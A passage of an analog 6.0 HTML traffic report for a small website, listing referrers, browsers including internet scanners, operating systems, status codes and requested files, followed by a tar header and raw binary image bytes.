Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">51</td><td class="xl"><a href="http://www.ia.imators.com/">http://www.ia.imators.com/</a></td></tr> <tr><td class="R">23</td><td class="xl"><a href="http://ia.imators.com/">http://ia.imators.com/</a></td></tr> <tr><td class="R">20</td><td class="xl"><a href="https://www.ia.imators.com/">https://www.ia.imators.com/</a></td></tr> <tr><td class="R">7</td><td class="xl"><a href="https://ia.imators.com/">https://ia.imators.com/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://www.ia.imators.com/cgi-bin/">https://www.ia.imators.com/cgi-bin/</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">90</td><td class="xl">http://www.ia.imators.com/</td></tr> <tr><td class="R">24</td><td class="xl">https://www.ia.imators.com/</td></tr> <tr><td class="R">10</td><td class="xl">http://ia.imators.com/</td></tr> <tr><td class="R">6</td><td class="xl">https://www.google.com/</td></tr> <tr><td class="R">4</td><td class="xl">https://ia.imators.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://webdisk.birkenheaddrill.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://158.193.145.151/</td></tr> <tr><td class="R">1</td><td class="xl">http://p7g6av7v.hongch.cn/</td></tr> <tr><td class="R">1</td><td class="xl">http://www.kaylanicoledigitalmarketing.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.gestionpl.ca/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.521qquu58.xyz/</td></tr> <tr><td class="R">1</td><td class="xl">http://175.27.248.198/</td></tr> <tr><td class="R">1</td><td class="xl">https://27.6.173.252/</td></tr> <tr><td class="R">1</td><td class="xl">http://uwcuapimanagement.configuration.azure-api.net/</td></tr> <tr><td class="R">1</td><td class="xl">https://clatsopcomputersolutions.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://b.blog.davideramirez.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://194.87.217.15/</td></tr> <tr><td class="R">1</td><td class="xl">https://mail.mgbacgiang3s.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://parkerjconstruction.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://175.24.179.113/</td></tr> <tr><td class="R">1</td><td class="xl">http://b.wjui.net/</td></tr> <tr><td class="R">1</td><td class="xl">http://156.237.46.172/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">43</td><td class="P">43</td><td class="xl">Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com</td></tr> <tr><td class="R">36</td><td class="P">36</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">36</td><td class="P">36</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36</td></tr> <tr><td class="R">35</td><td class="P">35</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36</td></tr> <tr><td class="R">32</td><td class="P">32</td><td class="xl">Mozilla/5.0 (compatible)</td></tr> <tr><td class="R">25</td><td class="P">25</td><td class="xl">Mozilla/5.0 \\(Windows NT 10.0\\; Win64\\; x64\\) AppleWebKit/537.36 \\(KHTML, like Gecko\\) Chrome/100.0.4896.60 Safari/537.36</td></tr> <tr><td class="R">22</td><td class="P">22</td><td class="xl">Mozilla/5.0 (X11; Linux i686; rv:109.0) Gecko/20100101 Firefox/120.0</td></tr> <tr><td class="R">18</td><td class="P">18</td><td class="xl">Go-http-client/1.1</td></tr> <tr><td class="R">16</td><td class="P">16</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1823.43</td></tr> <tr><td class="R">15</td><td class="P">15</td><td class="xl">Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)</td></tr> <tr><td class="R">14</td><td class="P">14</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36</td></tr> <tr><td class="R">13</td><td class="P">13</td><td class="xl">Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)</td></tr> <tr><td class="R">13</td><td class="P">13</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0</td></tr> <tr><td class="R">10</td><td class="P">10</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11</td></tr> <tr><td class="R">9</td><td class="P">9</td><td class="xl">Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA540537) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.3260.98 Mobile Safari/537.3</td></tr> <tr><td class="R">16</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36</td></tr> <tr><td class="R">8</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 (scanner.ducks.party)</td></tr> <tr><td class="R">38</td><td class="P">8</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">curl/7.61.1</td></tr> <tr><td class="R">14</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (compatible; wpbot/1.1; +https://forms.gle/ajBaxygz9jSR8p8G9)</td></tr> <tr><td class="R">6</td><td class="P">6</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td></tr> <tr><td class="R">11</td><td class="P">5</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.2; rb.gy/oupwis) Chrome/124.0.0.0 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36</td></tr> <tr><td class="R">19</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Mobile Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.80 Mobile Safari/537.36</td></tr> <tr><td class="R">12</td><td class="P">4</td><td class="xl">Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36</td></tr> <tr><td class="R">4</td><td class="P">4</td><td class="xl">Mozilla/5.0 (compatible; archive.org_bot +http://archive.org/details/archive.org_bot) Zeno/cfa2980 warc/v0.8.47</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">python-requests/2.27.1</td></tr> <tr><td class="R">9</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36</td></tr> <tr><td class="R">15</td><td class="P">3</td><td class="xl">Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/92.0.4515.159 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">curl/7.88.1</td></tr> <tr><td class="R">3</td><td class="P">3</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36</td></tr> <tr><td class="R">243</td><td class="P">71</td><td class="xl">[not listed: 126 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">463</td><td class="P">289</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">426</td><td class="P">272</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">10</td><td class="P">10</td><td class="xl"> Safari/535</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">17</td><td class="P">4</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">2</td><td class="xl"> Safari/534</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">1</td><td class="xl"> Safari/605</td></tr> <tr><td class="N">2</td><td class="R">145</td><td class="P">116</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">3</td><td class="R">43</td><td class="P">43</td><td class="xl">Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">43</td><td class="P">43</td><td class="xl"> Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains</td></tr> <tr><td class="N">4</td><td class="R">50</td><td class="P">37</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">28</td><td class="P">24</td><td class="xl"> Firefox/120</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">3</td><td class="xl"> Firefox/130</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/62</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/83</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Firefox/122</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/24</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/35</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">1</td><td class="xl"> Firefox/4</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">1</td><td class="xl"> Firefox/125</td></tr> <tr><td class="N">5</td><td class="R">18</td><td class="P">18</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">18</td><td class="P">18</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">6</td><td class="R">9</td><td class="P">9</td><td class="xl">curl</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">9</td><td class="P">9</td><td class="xl"> curl/7</td></tr> <tr><td class="N">7</td><td class="R">20</td><td class="P">8</td><td class="xl">Mozilla</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">9</td><td class="P">4</td><td class="xl"> Mozilla/1</td></tr> <tr><td class="N">8</td><td class="R">3</td><td class="P">3</td><td class="xl">python-requests</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">3</td><td class="P">3</td><td class="xl"> python-requests/2</td></tr> <tr><td class="N">9</td><td class="R">4</td><td class="P">1</td><td class="xl">googlebot</td></tr> <tr><td class="N">10</td><td class="R">11</td><td class="P">1</td><td class="xl">python-httpx</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">11</td><td class="P">1</td><td class="xl"> python-httpx/0</td></tr> <tr><td class="N">11</td><td class="R">1</td><td class="P">1</td><td class="xl">BlackBerry8320</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> BlackBerry8320/4</td></tr> <tr><td class="N">12</td><td class="R">3</td><td class="P">1</td><td class="xl">MSIE</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">1</td><td class="xl"> MSIE/9</td></tr> <tr><td class="N"> </td><td class="R">22</td><td class="P">0</td><td class="xl">[not listed: 9 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">254</td><td class="P">192</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">296</td><td class="P">177</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">244</td><td class="P">159</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">45</td><td class="P">16</td><td class="xl"> Unknown Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Windows 2000</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">5</td><td class="P">1</td><td class="xl"> Windows XP</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">0</td><td class="xl"> Windows CE</td></tr> <tr><td class="N">3</td><td class="R">122</td><td class="P">79</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">122</td><td class="P">79</td><td class="xl"> Linux</td></tr> <tr><td class="N">4</td><td class="R">119</td><td class="P">78</td><td class="xl">Macintosh</td></tr> <tr><td class="N">5</td><td class="R">1</td><td class="P">1</td><td class="xl">Symbian OS</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">854</td><td class="xl">200 OK</td></tr> <tr><td class="R">2</td><td class="xl">302 Document found elsewhere</td></tr> <tr><td class="R">110</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">645</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">12</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">41</td><td class="b"> 0.42%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">486</td><td class="b">32.51%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">315</td><td class="b">67.08%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">588</td><td class="b">57.23%</td><td class="xl">[directories]</td></tr> <tr><td class="R">175</td><td class="b">35.93%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">28</td><td class="b"> 4.45%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">21</td><td class="b"> 1.01%</td><td class="xl">.svg</td></tr> <tr><td class="R">1</td><td class="b"> 0.96%</td><td class="xl">.cgi [CGI scripts]</td></tr> <tr><td class="R">41</td><td class="b"> 0.42%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">588</td><td class="b">57.23%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">224</td><td class="b">41.39%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">1</td><td class="b"> 0.96%</td><td class="xl">/cgi-sys/</td></tr> <tr><td class="R">41</td><td class="b"> 0.42%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">588</td><td class="b">57.23%</td><td class="D">Apr/29/25 7:52 AM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">28</td><td class="b"> 3.89%</td><td class="D">Jun/27/24 12:00 AM</td><td class="xl"> <a href="/?195.211.77.140">/?195.211.77.140</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 3.08%</td><td class="D">Sep/15/24 3:19 PM</td><td class="xl"> <a href="/?198.235.24.138">/?198.235.24.138</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 2.02%</td><td class="D">Mar/ 1/25 3:30 PM</td><td class="xl"> <a href="/?104.166.80.124">/?104.166.80.124</a></td></tr> <tr class="sub level2"><td class="R">23</td><td class="b"> 2.38%</td><td class="D">Feb/28/25 11:54 PM</td><td class="xl"> <a href="/?45.148.10.172">/?45.148.10.172</a></td></tr> <tr class="sub level2"><td class="R">21</td><td class="b"> 1.82%</td><td class="D">Apr/26/25 8:56 PM</td><td class="xl"> <a href="/?192.42.116.194">/?192.42.116.194</a></td></tr> <tr class="sub level2"><td class="R">12</td><td class="b"> 1.42%</td><td class="D">Jul/26/24 5:12 AM</td><td class="xl"> <a href="/?199.45.154.72">/?199.45.154.72</a></td></tr> <tr><td class="R">93</td><td class="b">32.28%</td><td class="D">Apr/29/25 7:52 AM</td><td class="xl">/_autoindex/assets/js/tablesort.js</td></tr> <tr><td class="R">82</td><td class="b"> 3.65%</td><td class="D">Apr/29/25 7:52 AM</td><td class="xl">/_autoindex/assets/js/tablesort.number.js</td></tr> <tr><td class="R">28</td><td class="b"> 4.45%</td><td class="D">Apr/29/25 7:52 AM</td><td class="xl">/_autoindex/assets/css/autoindex.css</td></tr> <tr><td class="R">21</td><td class="b"> 1.01%</td><td class="D">Oct/ 5/24 10:12 PM</td><td class="xl">/_autoindex/assets/icons/folder-fill.svg</td></tr> <tr><td class="R">42</td><td class="b"> 1.38%</td><td class="D">Mar/16/25 10:05 PM</td><td class="xl">[not listed: 19 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> browrep.png 0000644 00000012723 15114762025 0006742 0 ustar 00 �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� dIDATx�흽r�ǁ7 x�<[��2�*��Y�0�v�؊.��}�e���+�r�ܻx�эn|c��;���\�b0�����`�wo�7��s��؍x��s�õ؛{�V�ݜa�Շuٽ���a&X�v��ր��5`�;` �k�Xv��ր��5`�;` �k�Xv�����b�r�6������m2,�o�ݽs���y",��=�������5�$�(�ݫk,ys_�uVמi��ҜUk8 K�*,�+��� ����۫+���]� �a�q~V�Xg\�3�,�c���n�qk V�������ae}�k�=�nXy��ڟ'����Z���NZ������N��F�V)`Ua��8[�������*�2���g�[��4�2��)��p�J`�x{n�*�U2�����:�V���?<% oE�{�Șp���sp/�`�X�`�,�v� �4Ն RR�|��h�y�����U 